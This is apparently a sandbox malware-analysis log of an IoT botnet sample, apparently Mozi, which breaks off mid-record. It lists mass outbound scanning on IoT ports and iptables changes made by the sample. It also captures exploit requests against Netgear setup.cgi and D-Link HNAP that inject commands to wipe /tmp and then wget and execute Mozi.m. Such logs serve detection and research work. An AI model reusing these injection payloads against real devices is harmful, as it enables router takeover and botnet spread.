                Source: global trafficTCP traffic: 192.168.2.20:37184 -> 173.191.56.106:8080
                Source: global trafficTCP traffic: 192.168.2.20:46266 -> 214.0.104.172:52869
                Source: global trafficTCP traffic: 192.168.2.20:60148 -> 206.34.195.249:81
                Source: global trafficTCP traffic: 192.168.2.20:41632 -> 134.240.237.208:8443
                Source: global trafficTCP traffic: 192.168.2.20:50748 -> 221.163.252.68:7574
                Source: global trafficTCP traffic: 192.168.2.20:56358 -> 13.176.53.86:52869
                Source: global trafficTCP traffic: 192.168.2.20:56030 -> 152.180.2.14:8080
                Source: global trafficTCP traffic: 192.168.2.20:34140 -> 3.184.34.149:8443
                Source: global trafficTCP traffic: 192.168.2.20:57666 -> 171.141.124.240:8443
                Source: global trafficTCP traffic: 192.168.2.20:42454 -> 89.125.164.152:52869
                Source: global trafficTCP traffic: 192.168.2.20:49348 -> 193.121.216.28:8080
                Source: global trafficTCP traffic: 192.168.2.20:49216 -> 164.154.93.195:8080
                Source: global trafficTCP traffic: 192.168.2.20:42866 -> 222.34.74.234:8080
                Source: global trafficTCP traffic: 192.168.2.20:36006 -> 18.247.152.131:5555
                Source: global trafficTCP traffic: 192.168.2.20:47312 -> 204.170.101.0:37215
                Source: global trafficTCP traffic: 192.168.2.20:34394 -> 5.230.135.152:37215
                Source: global trafficTCP traffic: 192.168.2.20:39916 -> 118.110.234.130:7574
                Source: global trafficTCP traffic: 192.168.2.20:33904 -> 122.25.166.83:52869
                Source: global trafficTCP traffic: 192.168.2.20:45598 -> 45.204.245.109:49152
                Source: global trafficTCP traffic: 192.168.2.20:56044 -> 147.133.242.76:8080
                Source: global trafficTCP traffic: 192.168.2.20:59490 -> 19.118.124.110:7574
                Source: global trafficTCP traffic: 192.168.2.20:42346 -> 132.139.233.175:37215
                Source: global trafficTCP traffic: 192.168.2.20:59948 -> 117.21.87.201:7574
                Source: global trafficTCP traffic: 192.168.2.20:58880 -> 6.243.236.18:8080
                Source: global trafficTCP traffic: 192.168.2.20:45762 -> 3.67.142.9:5555
                Source: global trafficTCP traffic: 192.168.2.20:41018 -> 70.33.99.104:5555
                Source: global trafficTCP traffic: 192.168.2.20:42532 -> 152.100.167.36:8443
                Source: global trafficTCP traffic: 192.168.2.20:32890 -> 58.12.204.60:8080
                Source: global trafficTCP traffic: 192.168.2.20:32780 -> 4.2.179.224:81
                Source: global trafficTCP traffic: 192.168.2.20:54140 -> 196.106.27.28:81
                Source: global trafficTCP traffic: 192.168.2.20:52696 -> 123.224.23.253:8080
                Source: global trafficTCP traffic: 192.168.2.20:36056 -> 22.193.177.229:52869
                Source: global trafficTCP traffic: 192.168.2.20:52546 -> 93.204.44.191:8443
                Source: global trafficTCP traffic: 192.168.2.20:51248 -> 35.83.92.160:5555
                Source: global trafficTCP traffic: 192.168.2.20:39020 -> 204.121.33.136:49152
                Source: global trafficTCP traffic: 192.168.2.20:58310 -> 175.140.231.185:8080
                Source: global trafficTCP traffic: 192.168.2.20:39544 -> 133.59.219.177:49152
                Source: global trafficTCP traffic: 192.168.2.20:52212 -> 43.25.44.12:7574
                Source: global trafficTCP traffic: 192.168.2.20:41908 -> 209.121.184.1:49152
                Source: global trafficTCP traffic: 192.168.2.20:53734 -> 219.159.206.231:49152
                Source: global trafficTCP traffic: 192.168.2.20:47382 -> 143.190.192.234:81
                Source: global trafficTCP traffic: 192.168.2.20:43158 -> 160.205.73.207:5555
                Source: global trafficTCP traffic: 192.168.2.20:32832 -> 117.175.62.17:52869
                Source: global trafficTCP traffic: 192.168.2.20:43804 -> 180.27.20.9:8443
                Source: global trafficTCP traffic: 192.168.2.20:48400 -> 79.46.53.90:5555
                Source: global trafficTCP traffic: 192.168.2.20:51920 -> 170.153.165.207:37215
                Source: global trafficTCP traffic: 192.168.2.20:52388 -> 25.120.108.166:37215
                Source: global trafficTCP traffic: 192.168.2.20:38936 -> 88.143.113.184:37215
                Source: global trafficTCP traffic: 192.168.2.20:43268 -> 15.35.59.131:8080
                Source: global trafficTCP traffic: 192.168.2.20:44336 -> 44.140.107.144:37215
                Source: global trafficTCP traffic: 192.168.2.20:40376 -> 106.57.104.27:8080
                Source: global trafficTCP traffic: 192.168.2.20:37816 -> 119.44.94.32:8080
                Source: global trafficTCP traffic: 192.168.2.20:58936 -> 222.91.171.102:5555
                Source: global trafficTCP traffic: 192.168.2.20:50526 -> 152.99.103.175:81
                Source: global trafficTCP traffic: 192.168.2.20:35450 -> 168.17.134.196:8080
                Source: global trafficTCP traffic: 192.168.2.20:51626 -> 197.177.18.211:8080
                Source: global trafficTCP traffic: 192.168.2.20:56636 -> 196.83.210.30:8443
                Source: global trafficTCP traffic: 192.168.2.20:38300 -> 185.155.197.240:81
                Source: global trafficTCP traffic: 192.168.2.20:33164 -> 121.26.58.85:49152
                Source: global trafficTCP traffic: 192.168.2.20:56170 -> 164.150.9.40:7574
                Source: global trafficTCP traffic: 192.168.2.20:39376 -> 51.12.46.124:5555
                Source: global trafficTCP traffic: 192.168.2.20:48264 -> 121.149.137.245:8080
                Source: global trafficTCP traffic: 192.168.2.20:42412 -> 2.93.191.137:8080
                Source: global trafficTCP traffic: 192.168.2.20:41438 -> 189.120.2.56:81
                Source: global trafficTCP traffic: 192.168.2.20:50726 -> 177.173.185.50:5555
                Source: global trafficTCP traffic: 192.168.2.20:48968 -> 43.219.247.168:7574
                Source: global trafficTCP traffic: 192.168.2.20:54234 -> 91.65.28.188:8080
                Source: global trafficTCP traffic: 192.168.2.20:51310 -> 177.152.69.68:81
                Source: global trafficTCP traffic: 192.168.2.20:52066 -> 65.70.118.43:8080
                Source: global trafficTCP traffic: 192.168.2.20:45870 -> 188.24.124.134:49152
                Source: global trafficTCP traffic: 192.168.2.20:60646 -> 166.82.7.224:7574
                Source: global trafficTCP traffic: 192.168.2.20:42804 -> 217.94.12.32:81
                Source: global trafficTCP traffic: 192.168.2.20:45324 -> 31.15.157.79:8080
                Source: global trafficTCP traffic: 192.168.2.20:37168 -> 167.68.166.142:8080
                Source: global trafficTCP traffic: 192.168.2.20:44994 -> 179.125.55.171:49152
                Source: global trafficTCP traffic: 192.168.2.20:53832 -> 212.136.201.1:8080
                Source: global trafficTCP traffic: 192.168.2.20:54182 -> 88.151.118.122:49152
                Source: global trafficTCP traffic: 192.168.2.20:55594 -> 20.188.249.215:5555
                Source: global trafficTCP traffic: 192.168.2.20:51284 -> 29.173.93.82:5555
                Source: global trafficTCP traffic: 192.168.2.20:53790 -> 41.225.3.47:8080
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 53.150.184.227:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 66.51.200.37:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 181.150.246.6:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 86.87.169.9:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 135.159.46.50:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 81.122.5.245:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 101.175.97.186:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 201.16.210.127:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 150.231.221.134:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 165.27.212.212:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 35.145.36.100:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 184.123.210.115:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 84.139.204.146:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 210.20.165.119:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 90.245.89.183:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 102.40.194.39:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 117.110.44.183:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 187.84.203.177:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 145.127.164.51:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 212.60.191.99:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 46.92.49.206:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 90.60.92.48:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 164.125.182.98:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 210.11.149.99:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 68.213.132.158:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 206.141.207.185:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 37.36.151.108:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 99.148.128.207:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 188.2.194.211:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 27.247.199.146:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 148.17.145.65:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 145.224.134.187:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 17.179.66.133:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 94.136.154.153:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 195.153.115.31:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 82.26.125.94:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 148.166.250.32:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 73.60.149.25:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 73.38.107.147:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 46.69.94.69:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 206.45.246.151:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 89.207.33.190:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 211.121.235.206:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 81.181.240.162:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 37.141.143.27:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 37.126.181.96:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 111.71.34.120:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 209.70.240.234:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 71.90.204.120:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 169.164.54.25:2323
                Source: global trafficTCP traffic: 192.168.2.20:32898 -> 54.217.177.252:8080
                Source: global trafficTCP traffic: 192.168.2.20:51920 -> 91.128.122.128:7574
                Source: global trafficTCP traffic: 192.168.2.20:54630 -> 83.158.11.78:8080
                Source: global trafficTCP traffic: 192.168.2.20:50738 -> 219.170.242.188:37215
                Source: global trafficTCP traffic: 192.168.2.20:39524 -> 79.209.77.202:49152
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 187.201.188.204:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 166.40.116.98:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 118.148.44.14:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 5.203.164.245:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 162.139.86.71:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 209.174.66.76:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 166.38.89.126:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 120.0.30.153:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 178.137.1.177:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 69.68.118.29:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 92.154.174.188:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 184.171.204.218:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 59.250.162.213:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 182.82.125.53:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 121.36.221.166:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 80.18.245.185:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 200.141.44.86:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 97.229.39.239:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 102.53.0.243:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 27.3.146.85:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 36.170.191.82:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 187.78.202.173:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 201.198.23.60:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 179.131.194.114:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 86.67.177.59:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 13.100.254.46:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 158.118.208.135:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 130.221.150.32:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 177.168.241.5:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 12.59.131.86:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 67.52.33.137:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 209.64.40.28:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 104.126.166.232:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 57.181.135.64:2323
                Source: global trafficTCP traffic: 192.168.2.20:45494 -> 82.194.132.178:49152
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 153.71.86.60:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 89.62.41.91:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 166.24.116.26:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 91.80.195.73:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 158.233.4.149:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 66.162.164.85:2323
                Source: /bin/sh (PID: 4638)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT
                Source: /bin/sh (PID: 4672)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT
                Source: /bin/sh (PID: 4679)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT
                Source: /bin/sh (PID: 4720)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT
                Source: /bin/sh (PID: 4732)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT
                Source: /bin/sh (PID: 4755)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT
                Source: /bin/sh (PID: 4763)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT
                Source: /bin/sh (PID: 4785)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT
                Source: /bin/sh (PID: 4815)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4819)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4838)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4866)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4896)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4915)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 4939)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 4966)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 4986)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 4992)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5015)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5042)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5063)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5071)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5095)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5119)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5139)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT
                Source: /bin/sh (PID: 5158)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT
                Source: /bin/sh (PID: 5167)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT
                Source: /bin/sh (PID: 5194)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT
                Source: /bin/sh (PID: 5215)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT
                Source: /bin/sh (PID: 5229)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT
                Source: /bin/sh (PID: 5253)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT
                Source: /bin/sh (PID: 5265)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 81.196.113.75:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 184.86.117.97:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 210.190.146.92:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping 